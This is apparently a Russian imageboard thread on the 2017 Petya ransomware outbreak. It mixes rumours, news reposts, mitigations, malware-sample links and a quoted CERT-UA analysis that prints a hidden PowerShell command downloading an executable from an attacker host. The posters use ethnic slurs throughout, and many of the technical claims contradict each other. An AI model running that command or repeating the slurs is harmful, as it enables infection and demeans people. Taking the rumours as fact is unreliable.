https://twitter.com/RosneftRu/status/879682706258440192

Компы правительства Усраины зашифрованы:

https://lenta.ru/news/2017/06/27/pochti_wannacry/

>>1059295

Ну вот и пизда хохлам!

>>1059293
расстреливать на месте! как дидов диды

Короче, как мне заразить компы у себя на работе?
Мимо коллектор

>>1059304
Хохлуту же.

>>1059307
Отсоси у программиста.

>>1059307
"Если машина смотрит в интернет "белым" (маршрутизируемым) адресом и открыт 445 порт..."

>>1059304
А что не так, даун?

>>1059313
а если закрыт, где скачать вирус можно?)

>>1059316
Хохол, спок.

>>1059316
надо быть конченным, что бы в 2к17 году юзать винду.

>>1059320
зачем тебе вирус если ты можешь взять и всё сломать без него

>>1059331
вопрос отменяется. не прочел до конца там.

>>1059331
да

>>1059332
не получить пизды потом?

>>1059331
присмотрелся. на самом деле это фейковая проверка диска. а реально - шифрование его. в норме другие надписи

>>1059304
На XP скорее всего, причем.

>>1059332
Самый страшный вирус - хохлушка за компом.

В сети была инфа, что на pastebin утекли архивы топов роснефти. Доставьте ссылку на эти архивы

>>1059382
За щекой проверяй

>>1059325
>Я скозал!

>>1059325
ну, да, лучше сборочку линя накатить и и держать маня-контору для ее поддержки

>>1059419
Вирусы-шифровальщики скозали)

>>1059347
есть такая версия:

Вирус Petya.A чаще всего распространяется через спам-сообщения электронной почты, содержащие ссылки на скачивание файлов с Dropbox под названием "приложение folder-gepackt.exe". Когда файл загружается и открывается, активируется вирус.

>>1059445
>gepackt

Немцы?

>Башнефти
>Роснефти
>украинских банков
Дайте угадаю, выглядит это так - все эти необучаемые уебки сидят на сперме образца эдак 2012-года, где стоит только ихнее кустарное ПО, какое-нибудь 1с и больше нихуя.

>>1059445
лел, качать exe файлы в 2к17

>>1059471
пока путь заражения толком никто не знает. ждём
но нашёл за прошлый год ещё про эту петю статейки

http://bedynet.ru/petya-вирус/

Чекайте баланс онлайн
https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX?sort=0

>>1059488
за щекой поищи рыбаков
я её спрятал кагбе

>спермопроблемы

>>1059485
хуйпизда!11!

Мало платите - получайте хуёвых работников. Может дойдёт до руководства, что лучше лишний лям не себе в офшор, а на нормальных админов потратить.

Уже биткоин накидали.

Меня эито вобще должно как то беспокоить? Роснефть еще что то там, да гори оно все синим пламенем.

>>1059279 (OP)
Что за аутист писал тексты на скринах? Явно не в ладах с инглишем.

>предложено перевести $300 в биткоинах по указанному адресу
Теперь надеюсь всем понятно для чего нужен БИТОК?

>>1059550
Нормально там всё, я смог перевести текст.

>>1059564
майнеры поднимают стоимость биткоина

>>1059564
Для преступников.

>>1059564
>юсь всем понятно для чего нужен БИТ
>>1059572
Я майнир, у миня кредит, курс падает. А заебошука я вирус.

>>1059574
намекаешь что биток будет следующим после телеграммы этой вашей?

>>1059583
Да. Но параллельно власти создадут крипторубль и разрешат только его.

>>1059589
А может у них локалка, м?

>>1059589
есть версия что кликнул кто-то один. а оно разошлось по сети через дыры.
пока толком ничего не известно

>>1059598
А прикол это сисадмин случайно кликнул, когда порнуху смотрел.

>>1059595
>крипторубль
Курс которого будет ниже рубля

>>1059596
Ну так и хули, у них что там, все компы в сети с правами администратора?

>>1059603
Потому я смотрю порнуху с виртуалки.
мимоадмин

>>1059606
зная какие там порядки (непонаслышке) - да. вполне вероятно. админ заебётся в случае чего бегать по всем абиснять куда жать если что-то не работает. проще сразу права дать

>>1059611
Как к тебе коллеги относятся? Или вспоминают только когда что-то наебнётся?

>>1059604
И майнтиь его можно только на эльбрусе.

прикиньте какая сейчас чистка бурситетских сис админов пойдет....

>>1059635
ору

>>1059635
эльбрусы раскупят враз

>>1059651
нахера, курс же меньше рубля

>>1059651
и таки где эти ваши эльбрусы можно раскупить?

>>1059589
>В блоге «Лаборатории Касперского» появилась публикация с информацией о том, как происходит заражение. По словам автора, вирус распространяется в основном через HR-менеджеров, так как письма маскируются под сообщение от кандидата на ту или иную должность.
«HR-специалист получает фальшивое письмо со ссылкой на Dropbox, по которой якобы можно перейти и скачать «резюме». Вот только файл по ссылке является не безобидным текстовым документом, а самораспаковывающимся архивом с расширением .EXE», — рассказывает эксперт.
После открытия файла пользователь видит «синий экран смерти», после которого Petya.A блокирует систему.

>>1059666
Ну у них же должен стоять бесплатный аваст хотя-бы.

>>1059360
Двачаю. Не видел чтобы во время проверки нельзя было вырубать.

>>1059682
>Ну у них же должен стоять бесплатный аваст хотя-бы.
>Пидорашки
>Антивирус
Слишком заумно

https://blog.kaspersky.ru/secure-dropbox-alternatives/17837/

>>1059682
не спасет. Его только Касперский видит и то вряд ли.

>>1059694
фиксую.это не то

>>1059293
Охуеть, Роснефть уже взяли на себя судебные функции

>>1059682
Щас эксперты из /s/ пояснят что
>2017
>антивирус

Офисный планктон из одной компании подвергшейся атаке репортинг ин. Минут за десять наебнулась вся локалка в офисе (компов 15-20). Я в этот момент делал отчетик, ничего не качал весь день, так что распространение наверно может идти и через один комп. Появилось сообщение, что комп выключится через минуту, поптом фейковый чек диск и красный шрифт со скринов выше. Шарящие аноны подскажите, данным реально пизда? И никак не восстановить? У айтишника нехило припекло кстати.

>>1059704
государство много лет работает на то чтобы самых тупых, лояльных и послушных даунов поднять наверх. а ты чему-то удивляешься

>>1059705
>И никак не восстановить?
Не, ну в принципе можно, только подбор ключа займёт пару лет.

>>1059705
> Появилось сообщение, что комп выключится через минуту,
анальная 10-ка?

>>1059705
есть кое-какие бестолковые инструкции про то как вернуть комп к жизни. в частности восстановление сделать (или руками реестр вернуть). либо загрузочную запись пофиксить. но это всё не поможет при расшифровке файлов.

>>1059293
напоминает гифку, где собака бросалась на свою заднюю лапу.

>>1059694
>от 59$
>48 долларов в год
>От 96 долларов
Уноси это говно. Юзаю веракрипт и гуглдрайв - 0 в год, брат жив.

>>1059730
это было не в тему

>>1059293
В комментах троллеркоастер.

>>1059711Семерка у всего офиса

По факту.
1. Уязвимы ВСЕ OS Windows, включая 10-ку с последними обновлениями
2. Распространяется молниеносно по сети, явно эксплуатируя SMB уязвимость.
3. Антивирусные компании решений пока не предоставили (NOD, Symantec, Fortinet), есть подтвержденные (лично) заражения ПК с решениями от данных компаний. Некоторые публичные ресурсы этих компаний — вообще лежат, например fortiguard.com.
4. Действительно шифрует MBR, GPT вроде бы не трогает. Оставляет на локальных дисках файл readme с текстом, аналогичном выводимому при загрузке. Несистемные диски (в т.ч. сетевые) — НЕ шифрует.
5. При перезагрузке выводит имитацию checkdisk.

>>1059430
Дети в е ещё не понимают, что такое количество вирусов под винду обусловлено лишь её популярностью, был бы популярен линукс, каждый день на нулевой были бы треды о шифровальщиках под линукс.

>>1059769
кстати про минуту. такая же хуйня была с WANNACRY. признак заражения через SMB

>>1059463
нет, нужно накатывать ежедневно 50 обновлений и патчей, на последней версии 10 ?

>>1059769
заплатку после эпидемии WANNACRY ставили? или всем похуй как всегда?

>>1059778
Сегодня в бухгалтерии заразилось три компа, два из которых при включений ругались на отсутствие системного диска. Третий же включался с красным экраном вымогателя. КОгда зашел на него с Live CD, увидел пустые диски. На тех двух компах стояли MSE, которые, похоже, уничтожили вирус. Никаких записок нет. Повреждены все документы и часть БД бухгалтерского софта. На эти три ПК за последние сутки ничего не качалось. Есть подозрение, что заражение произошло через один из бухгалтерских софтов.

>>1059279 (OP)
Да уже не банков, лол, в украшке только что распространили сообщение вырубить все компьютеры к хуям, у них там от метрополитена и аэропортов до укэнерго и мвд атакованы.

Хохлы уже успели заявить, что "не вызывает сомнений, что атаку организовал Путин, потому что мы находимся в состоянии гибридной войны", лол.

Украшки в очередной раз показали себя как пидорашки. Большая пыня им вместо европейских ценностей сулит. Пидорашки не меняются, даже если они в Украине.

>>1059780
Зачем пиздеть о том в чем не разбираешься?

>>1059778
>включая 10-ку с последними обновлениями
Либо это ебаный пиздежь, либо соснут ВСЕ.

>>1059293
ВОЛОДИН НЕ ГЕЙ Я СКОЗАЛ! ПРЕКРАТИТЕ НЕМЕДЛЕННО!

>>1059809
Заражены компы, на которых установлен бухгалтерский софт.

>>1059820
а остальные точно такие же но без бухгалтерского софта не заражены да?

>>1059804
>и часть БД бухгалтерского софта
так вам и надо, дауны.
базы не должны там находиться. как и документы.
сэкономили на правильном админе - сосите хуй.

Представители "Мегафона" заявили, что не выявили заражения новой вредоносной программой. Услуги связи оказываются оператором в полном объеме.

Аналогичную информацию озвучили в пресс-службе "Вымпелкома" и Tele2. Сети МТС также работают в штатном режиме. Представители компании подчеркнули, что оператор обладает глубокой экспертизой в защите от киберугроз.

Ранее сообщалось, что вирус-вымогатель Petya.A атаковал нефтяные, телекоммуникационные и финансовые компании РФ и Украины. Программа блокирует компьютеры и требует 300 долларов в биткоинах за восстановление доступа к файлам. Среди жертв вирусной атаки оказались "Роснефть", "Башнефть", Mars, Nivea и производитель шоколада Alpen Gold Mondelez International.

По данным представителей международной исследовательской команды "Лаборатории Касперского" вирус распространился не только в России и на Украине, но и по всему миру

Ребят, не шарю в этих вещах, но могу ли я заиметь петю через торрент? Качаю сейчас игрушку и чет очко жмется

>>1059829
Да. С моей пекарней все ок.
>>1059836
Это тоже, но как ни странно, базы 1с не затронуло, зато документы, находящиеся в папке с базой, зашифровались.

>>1059829
твой комп залатан от wannacry?
а бухгалтерские компы залатаны? ~были~

>>1059860
>Да. С моей пекарней все ок.
Еще бы ты как то пруфы предоставил и я бы спал спокойно.

>>1059859
Разумеется, в кряк подсунуть вместо экзешника. Ты еще и сам антивирусник вырубишь, когда всплывет просьба.

И вообще ничего качать ничего не надо, достаточно иметь открытый порт и уязвимость, которую ты разумеется не пофиксил, потому что обновляешь шиндоус раз в год. Так что не ссы, оно само тебя найдет.

>>1059867
На всех стоит одинаковая семерка.
>>1059874
Пруфы чего? Крякозябров в doc и xls файлов? Так я не на работе уже, лол.

>>1059881
ну так я сейчас докачаю, офну адаптер и все. Просканирую антивирусом папку

>>1059886
весь вопрос в том насколько одинаковая

Всем приготовиться

>>1059891
Вообще одинаковая. Даже шара. У меня только 1с и прочего бух говна нет.

Ебать какая мощная хакерская атака, пиздец просто. Это они ещё с по от майл ру не боролись.

>>1059894
Сталкер 2 на подходе.

>>1059790Уверен что нашему айтишнику было похуй, вот видимо у него и припекло знатно.

>>1059894
я медленно надеваю хим защитный костюм

>>1059906
Нехуйственно маркетологи пиар ему мутят.

>>1059894
Бре-хня!
АЭС по "ГОСТу" не имеют контактов с сетью Internet. Они ПОЛНОСТЬЮ АВТОНОМНЫ.

>>1059894
Хохлы под шумок угрожают и клянчат денег.

>>1059916
То-то мой кореш ебашит в дотку на ночном дежурстве на чаэс.

>>1059916
http://www.interfax.ru/world/568282

https://twitter.com/MrCarlMcDade/status/879706580127809536
>rar
Анон, прячь свои паки с цп.

>>1059943
Я думал погромисты умные люди и так не расписывают свои вирусы.

Служба безопасности Украины установила источник вируса Petya, поразившего госучреждения и украинские компании во вторник.

Об этом спецслужба сообщает в Facebook.

«По данным СБУ, подавляющее большинство заражений операционных систем происходила через открытие вредоносных приложений (документов Word, PDF-файлов), которые были направлены на электронные адреса многих коммерческих и государственных структур», — сказано сообщении.

Атака использовала сетевую уязвимость MS17−010, в результате эксплуатации которой на инфицированную машину устанавливался набор скриптов, используемых злоумышленниками для запуска шифровальщика файлов Petya.A.

«Вирус атакует компьютеры под управлением ОС Microsoft Windows путем шифрования файлов пользователя, после чего выводит сообщение о преобразовании файлов с предложением произвести оплату ключа дешифрования в биткоинах в эквиваленте суммы $ 300 для разблокировки данных. На сегодня зашифрованные данные, к сожалению, расшифровке не подлежат», — сказано в сообщении.

>>1059949
Не вижу слова РОССИЯ

>>1059953
ну сначала кукарекнули традиционно. а потом стали разбираться

.

>>1059960
Зависит от страны проживания.

>>1059960
ПИдорахии же.

Депутат Верховной Рады и советник министра внутренних дел Антон Геращенко утверждает, что письма с вирусом, поразившим украинские компание и учреждений, приходили им в течение месяца.

>>1059960
Тупые хохлы сами себе проблемы создают.

>>1059943
Т.е. если я сделаю бэкап анимы архивом, а потом переименую его в ANUIDISUDA.UBLUDOKMATTVOU, то шифровальщику будет похуй на этот файл?

>>1060015
>>1059778

>>1060015
Да. У бухов осталось куча бэкапов, сделанных именно таким способом.

Мимо все тот же счастливчик, у которого три бухгалтерши подцепили вирус в одно и то же время.

>>1060020
Типа того, но подозрительных .exe файлов не запускалось. Фейковое окно проверки диска точно такое же. "Проверка" длилась минут 20.

>>1060015
возможно. НИЗНАЮ ЯНЕ ХАКИР

>>1059589
например wannacry.a может путешествовать по сети по 445 порту.

>>1059814
Кроме линуксобогов.

>>1060028
видео ускорено. а вирус замаскирован под само распаковывающийся архив. который обычный .exe

>>1060038
по крайней мере вирус 2016 года.
А это уже модификация походу того вируса.

>>1060023
есть версия почему не заразился ты а заразились они. они РАНЕЕ могли нажимать на заразу. а активаровалась она только сейчас. Геращенко говорит про это
(это если заражение не через SMB пошло)

Хули все ссыкуют петю ? Юзлесс кусок дерьма, удалить которое нет проблем, просто долбоебы раздули про суперхуцкеров, ибо сами обсераются увидев окошко выбора после некорректного выключения пк.

Чет читнул тред, ни одного совета по превентивной защите. Что делать-то: 3 порта закрыть и скачать обнову, которую пару месяцев назад рекомендовали скачать везде? Или еще что-то?

>>1060043
Документы на двух ПК зашифровались в одно и то же время (с точностью до секунды). В логе антивируса указано, что он успешно удалил Petya.A за пару минут до изменения документов. Повторные сканирования ничего не нашли. Вряд ли антивирус молчал бы несколько дней. В истории скачивания ни одного exe за месяц.

>>1060100
Ничего не делай, кому твой пк нужен ?

>>1059778
>4. Действительно шифрует MBR, GPT вроде бы не трогает. Оставляет на локальных дисках файл readme с текстом, аналогичном выводимому при загрузке. Несистемные диски (в т.ч. сетевые) — НЕ шифрует.
>
>>1060100

>>1060105
Понятно что не нужен, но заражение же рандомно происходит.

>>1060104
>антивирус
Одна из самых бесполезных программ в мире, обойти это дерьмо сможет даже школьник, который говонокодит на питоне.

>>1060109
Пиздеж. Покоцал доки на всех дисках, в т ч на съемных. Никаких записок не оставил.

>>1060109
А под системным диском подразумевается логический или физический?
Я так понимаю, можно просто винду переустановить с форматацией и норм?

>>1060116
Да, но этот самый MSE не дал улететь вообще всему; винду удалось поднять через bootrec /fixmbr. А пк без антивируса пришлось форматировать к хуям.

>>1060111
Ну словишь вирус и фиг с ним, пофиксить его как 2 пальца обоссать.

>>1060117
А что не покоцал? Образы True Home Image коцает?

>>1060118
в двух словах если у тебя винт больше 2тб, не ссы

>>1060128
Ну пофикси. А я тебе 1к на карту скину.

>>1059704
>эйчары
>грамотные

>>1060128
Так напиши плиз. Я ж говорю, в треде не видел.

>>1060132
У меня меньше к сожалению. Но выше пишут, что на съемных тоже коцает.

>>1060137
фикс за 300$ в виде ключа

>>1060142
Петя плиз

Зачем они требуют суммы в сотни долларов? Требовали бы там по паре долларов, намного больше людей бы платило. Ещё акции было бы неплохо устраивать, вроде зарази машину знакомого/соседа/корпорации, получи скидку в 20%.

>>1060144
подожди, создам новый биткоин кошелёк.

>>1060134
>>1060137
Что там фиксить ? Не дайте ему зашифровать и всё, чекаешь процессы и видишь что-то подозрительное удаляшь файл от которого это исходит, если он просто выкинет на экран мол, ебать я всё заблокировал, сасай кудасай, офаешь пк с резетки, ибо он не мог так быстро всё зашифровать и просто тянет время пока ты обмазываешь стул повидлом.

>>1060175
Так они корпорации заражают, а те бохатые

>>1060181
Мои бухи заметили что что-то неладное, когда открыли xls файлы и увидели крякозябры вместо привычных таблиц. Как ты представляешь себе чекать процессы 24/7?

>>1060181
Ну я тоже про розетку подумал. А дальше то что? Форматнуть сис.диск?
Алсо, я сплю с включенным компом, он может и ночью ВТАЙНЕ все зашифровать успеть. Тьфу-тьфу-тьфу

>>1060200
Ну подобное грузит систему, так что если у тебя вместо обычных 10% загружено больше, проверяешь процессы.
>>1060201
Удалять то, что скачал перед этим, акронисом/командной строкой/любым другим способом.

>>1060175
Неплохая мысль, вот только бы за каждого зараженного и выплатившего получаешь 2% да даже 1%, тогда бы сотрудники с большим желанием клацали на всё попало, перед тем как выкидывать в чекдиск надо ввести номер свой карты для получения бонуса.

>>1060221
А вирусняк-то только в эксешнике может быть или других форматах тоже?

>>1060229
банкоматы скачивают обновления, если ты не знал.

>>1060229
Карточку с вирусом вставили

>>1060245
дайте чаю этому господину

>>1060242
Под многие форматы можно спрятать вирус.

Вирус попадает на пеки в Украине через программу M.E. doc. Так что мамкиным хикканам бояться нечего.
https://antikor.com.ua/articles/176649-virus_petya.a_v_kieve_bankomaty_nachali_prositj_denjgi

Вот поэтому мои бухи его подцепили, а я - нет.

>>1060261
Охуеешь тогда удалять все накачанное

Охуенно. World war 3.0

>>1060273
У него вирусы в этих вебмах, не открывайте.

>>1060273
Зима близко

>>1060300
Winter is coming

Кибер Коммандование - сидит итт и активно поддерживает анбшные эксплоиты.

ФСБ - пожелал лично расправиться с хакерами физически.

Майкрософт - предложил СКАЧАТЬ ОБНОВЛЕНИЕ, а не сидеть на жопе.

8200 - предлагает больно и унизительно ПОКАРАТЬ ИХ СВОИМ STUXNET'OM

Сноуден - предложил снять документальный фильм про ОХУЕВШИХ ПРОГРАММИСТОВ.

КНДР ХРАНИТ МОЛЧАНИЕ.

Symantec - высрал два невнятных твита.

КАСПЕРСКИЙ - В панике, плачет, т.к. никто не покупает подписку.

Китай - Надеется, что фаерволл остановит этот хаос.

АНБ - Нерво покуривает, т.к. зашифровался главный вход в Форт Мид.

>>1060020
поделись exe'ником

>>1060310
Габен - в общем хл3 не будет

>>1060066
Это новый петя.

>>1060313
тут семплы
https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759

>>1059804
Если хохол, то это медок, слишком много жалоб на эту хуйню отовсюду.

>>1059704
Вроде бы в виндоус нужно отдельно ставить галочку над опцией, которая показывает действительное расширение файла. Как и со скрытыми папками.

>>1060591
Да уже нагуглил, что медок. Пиздос. Можно этих уебанов засудить? На их сайте пусто, поддержка морозится.

https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
уже почти 3 (лол) BTC

>>1060618
М? Расшифруй

>>1060630
>7к долларов
Чет маловато. Я думал из-за масштабов он уже миллионер.

>>1060637
Просто потихоньку переводятся долбаебы, которые деньги вымогателям платят.

>>1060606
да вряд ли, скорее всего руководство медка уже запаковало чемоданы в израиль

>>1060310
>Касперский
>Русский рэпер

>>1059696
Касперский от Wannacryptа не спас

>>1060687
MSE увидел и удалил петю, но тот все равно каким-то хуем умудрился зашифровать доки.

>>1060687
мне лично аутпост помог. но не от wannacry а раньше. от майнера юзающего ту же дыру
qqss77889900.exe
оно пыталось в автозагрузку залезть. аутпост спросил пускать ли. конеш сразу было видно что это зараза. сначала причём непонятно откуда взявшаяся (win7 без обнов)
https://virustotal.com/en/file/04179266d6958f93570732719acef1164d4e593369ab677bc6998aa37a40fd26/analysis/

>>1059811
Ну так и не пизди.
Ин бифор: > кококомпилировать твой вирус придёца на каждой системе, я скококзал!

1. Кого поразил вирус?

Неизвестный вирус поразил сети целого ряда крупных компаний, в том числе крупных государственных. Известно, что вирус атакует компьютеры на базе Windows.

Около 13.30 "Стране" стало известно о хакерской атаке на "Ощадбанк". При этом в официальном сообщении банк поначалу заявлял, что никакой атаки не было – якобы компьютеры в отделениях перестали работать из-за плановых технических работ.

Известно, что вслед за "Ощадом" вирус охватил также банк "Пивденный", "Укргазбанк", "ТАСКОМБАНК", и небанковские предприятия, среди которых – энергокомпания "Киевэнерго", "Укрпочта", аэропорт "Борисполь", "Укразализныця". Атаке подверглись и негосударственные компании, например, "Новая почта". Вирус даже парализовал сайты всех СМИ Украинского медиахолдинга. От вируса-захватчика также перестала работать вся интернет-сеть Кабинета министров. Уже известно, что вирус атаковал и заправки.

Хакерской атаке подверглись также некоторые крупные госкомпании в России. В частности, о "мощной хакерской атаке" на свои сервера заявила "Роснефть".

Пока неизвестно, являются ли хакерские атаки в Украине и России действиями одной группы лиц.

Полный список пораженных вирусом компаний "Страна" уже собрала. Список постоянно обновляется.

2. Что это за вирус?

IT-специалисты говорят, что это вирус который называется Petya A или mbr locker 256, который относится к вирусам-вымогателям.

MBR - это главная загрузочная запись, код, необходимый для последующей загрузки ОС и расположен в первом секторе устройства. После включения питания компьютера проходит так называемая процедура POST, тестирующая аппаратное обеспечение, по прохождению которой BIOS загружает MBR в оперативную память по адресу 0x7C00 и передает ему управление. Так вирус попадает в компьютер и поражает его. Модификаций вируса существует много.

Специалисты утверждают, что вирус является аналогом WannaCry, который в мае нанес миллиардный ущерб мировой экономике.

3. Как происходит "заражение"?

Как стало известно "Стране" из источников в одном из коммерческих банков, вирус-вымогатель активизируется с помощью ссылки, которая присылается на почту из неизвестного адреса.

Заражение идет через открытие писем. При заражении система падает и пользователь обычно пытается сделать перезагрузку. Но как отмечают эксперты, именно этого делать не стоит: после нее идет полная блокировка системы. Но пока достоверной информации о вирусе нет.

4. Какие симптомы?

Вирус распространяется очень быстро. За несколько часов он поразил десятки компаний по всей Украине.

Симптомы заражения неизвестным вирусом проявляются в отказе работы компьютеров на платформе Windows. Компьютеры перегружаются, а вся информация на них зашифровывается.

Айтишники одной из киевских редакций, проверили один из зараженных компьютеров, и оказалось, что вирус уничтожил все данные на жестком диске.

5. Чего хотят хакеры?

О требованиях вируса стало известно по фото экрана, который появляется при заражении компьютера. На данный момент известно, что вирус блокирует компьютер, а ключ к разблокированию продает за биткоины в эквиваленте $300.

"Хакеры требуют выкуп с биткоинами, но вы же понимаете, если "ляжет" банковская система Украины, хакеры от этого смогут получить профит гораздо больше, чем просто с биткоинов. Нужно следить за транзакциями. Не исключено, что под ударом окажется финмониторинг", – сообщил "Стране" IT-специалист.

6. Как лечить?

Самостоятельно – никак. Когда хакеры получат деньги, обещают прислать код, с помощью которого можно будет разблокировать компьютеры.

7. А это вообще лечится?

Глава ИнАУ Александр Федиенко не советует пользователям пораженных компьютеров соглашаться на требования хакеров и перечислять им деньги. По его словам, "вылечиться" уже не получится.

"Ни в коем случае нельзя перечислять им деньги. Это развод. Никакой код, никакая инструкция не поможет избавиться от вируса. Из того, что проанализировали наши специалисты, ясно, что из-за вируса идет полное шифрование файлов. Всю пораженную вирусом технику можно просто выбросить на помойку. От вируса вылечить компьютеры нереально. Если уже началось шифрование, это уже всё", – сказал "Стране" Федиенко.

8. Какова цель хакеров?

По мнению IT-экспертов, с которыми поговорила "Страна", так как вирус поразил не единичные компании и не ограничился банковскими учреждениями, хакеры намерены нанести ущерб всей экономике Украины.

"Чего хотят добиться хакеры – это скорее вопрос к психологам. Я не знаю. Но сейчас они уже добились того, что в экономике страны случился коллапс. Все застыло. Эта атака, я считаю, была сделала из экономических побуждений, нанести ущерб целой стране, а не отдельным компаниям. Скорее всего, эта атака приведет к большим экономическим убыткам. Это элемент терроризма. Кибер-тероризм", – комментирует Александр Федиенко.

9. Как защититься от вируса?

1) Обязательно пользоваться антивирусами. По мнению специалиста, Virus "Petya А" блокирует сервис Avast, тога как "Касперский" этот вирус не видит. Принудительно обновите базу антивируса и операционные системы.

2) Не скачивать сторонние программы и файлы.

3) Не переходите по сторонним подозрительным ссылкам, в том числе, из соцсетей. Особенно если они исходят от неизвестных вам пользователей. Хотя, по словам Федиенко, не стоит открывать вообще никакие файлы и программы, даже если вам их присылают ваши знакомые. Или пропускать их через антивирусы.

4) Если заражение все-таки произошло, после заражения не перезагружайте компьютер! Этим вы активируете вирус.

"К сожалению, других, более подробных и конкретных рекомендаций пока дать нельзя, потому что до сих пор не ясно до конца, что это за вирус", – говорит Александр Федиенко.

10. Кто стоит за хакерской атакой?

Пока неизвестно. Но то, что атака нацелена на экономику всей страны, говорит о факте вмешательства извне.

Советник министра МВД Антон Геращенко уже заявил, что кибератака под видом вируса-вымогателя была организована со стороны спецслужб РФ.

По словам Федиенко, недавно аналогичный вирус распространялся в Европе.

"Пока нет точных фактов, что это за вирус и откуда он пришел. Но я читал в иностранной прессе, что в Европе недавно была похожая атака. Но она развивалась очень медленно и вяло. Просто в связи с тем, что украинский сегмент интернета очень высокоскоростной, плюс хорошее проникновение абонентов, в Украине этот вирус распространяется молниеносно. Грубо говоря, за полчаса заражено пол-страны", – говорит Федиенко.

Специалист отмечает, что наша страна де-факто оказалась неготовой к такой кибератаке. "Это звездный час подразделения по кибербезопасности. Наши компетентные службы сейчас должны тщательно и быстро все проанализировать и дать четкие рекомендации нашей отрасли, как реагировать и как бороться с вирусом", – отмечает Александр Федиенко.

https://antikor.com.ua/articles/176664-10_voprosov_o_samoj_masshtabnoj_kiberatake_v_istorii_ukrainy сайт может быть заблочен

>>1060698
> (win7 без обнов)
> без обнов
> обновы это зондв ФБРКГБ мне прямо в анус
Ну и сиди, как дурак с зашифрованными файлами.

>>1059279 (OP)
Вот прям напрашивается
https://www.youtube.com/watch?v=e1crf4_aQxU

>>1060584
благодарочки

>>1060756
обновы шindoшs хуже заразы часто. ибо смывают активаторы и тд.
с файлами всё ок. читай не через строчку. это заражение(в конце апреля) привело к тому что я всё залатал и wannacry не прошёл.

>>1060731
Petya и Misha похоже на отсылку к taran & pidoran

>>1060768
> смывают активаторы и тд.
Пиздец проблема, лол. Активировался заново и всё. Пять секунд делов. Но нет, русня стерпит любые неудобства. Вороватая пидорашка.

>>1060802
Ты ебобо?

>>1060181
>Не дайте ему зашифровать и всё, чекаешь процессы
Всегда думал, что правильно настроенное Software Restriction Policies решит эту проблему.

Админы/кулкакиры в треде, так ли это?

>>1061159
ноунейм
https://habrahabr.ru/company/infosecurity/blog/331788/.a--petya.c--petrwrap-ili-petyacry#comment_10286542

известный васяночник(в каждой второй сборке винды есть его наработки)
https://habrahabr.ru/post/331762/#comment_10285898

https://geektimes.ru/post/274104/

служба e-mail, услугами которой пользовались злоумышленники, заблокировала почтовые адреса, на которые должны приходить данные об уплате выкупа. Так что даже если вы переведете деньги, вам не удастся связаться с ними, подтвердить перевод и получить ключ, необходимый для восстановления файлов.

Найден способ локально остановить исполнение программы вируса-вымогателя Petya, поразившего многие компьютеры в России и на Украине. Для этого в папке с Windows надо создать файл без расширения с именем "perfc" - его отсутствие вирус проверяет перед началом разрушительных действий. Впрочем, эксперты "Лаборатории Касперского" утверждают, что сети атаковал и другой вирус.

Если успеть до перезагрузки компьютера запустить команду bootrec/fixMbr, можно восстановить работоспособность операционной системы и запустить ее, отметили специалисты в Positive Technologies

>>1061433
(по другим данным - perfc.dat)

>>1061264
>Хотел разлочить Петю, скачал генератор ключа от добрых людей
>Парни, как разлочить Васю?

Вчера, 27 июня, многие украинские компании подверглись массированной кибератаке, в результате чего компьютеры были заражены вирусом-шифровальщиком Petya Ransomware.


Специалисты команды реагирования на компьютерные чрезвычайные события Украины CERT-UA проанализировали эту атаку и выработали рекомендации по защите компьютеров от проникновения вируса. Так, был проанализирован файл:

[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]

hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/

Данный файл, эксплуатирует уязвимость CVE-2017-0199.

После эксплуатации уязвимости на инфицированный компьютер загружался xls-файл (hxxp://84.200.16.242/myguy.xls)

[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]

hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/



Данный xls-файл выступал в качестве загрузчика и содержал в себе обфусцированный javascript код.

После деобфускации кода удалось выяснить, что с помощью команды Powershell на инфицированный компьютер был загружен исполняемый файл:

[myguy.exe][224500132b2537d599fe3314717b7ee5]

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)

Данный исполняемый файл использовался в качестве загрузчика дальнейшего функционала шифровальщика файлов Petya Ransomware.

Командно-контрольный центр:

hххp://coffeinoffice.xyz:80/cup/wish.php

Механизм распространения был заимствован у шифровальщика файлов WannaCry, который использовал уязвимость MS17-010 для распространения как по локальной, так и по глобальной сети.

После шифрования компьютера происходила перезагрузка системы, в результате которой жертва получала сообщения с требованием выкупа.

Данный тип шифровальщика повреждал таблицу MBR, в результате чего загрузка операционной системы не продолжалось.

По предварительным данным, указанный исполняемый файл загружал в директорию C:\Windows файл с названием perfc.dat, выступавший в качестве основного функционального элемента данного шифровальщика. Удалось выяснить, что шифровальщик файлов устанавливал в планировщике задач команду на перезапуск системы. После перезагрузки системы на инфицированный компьютер приходил фейковый chkdsk.

Следовательно, можно утверждать, что новый подвид Petya.A, который атаковал Украину 27 июня — это комбинация уязвимостей CVE-2017-0199 и MS17-010 (ETERNALBLUE, использованная в Wcry в результате утечки через ShadowBrokers).

Перечень индикаторов компрометации:

84.200.16.242:80

french-cooking.com:443

coffeinoffice.xyz:80

File Name Order-20062017.doc (RTF із CVE-2017-0199)

MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1

SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84

SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Name myguy.xls

MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25

SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73

SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6

Рекомендации CERT-UA по обеспечению защиты от заражения вирусом-шифровальщиком:

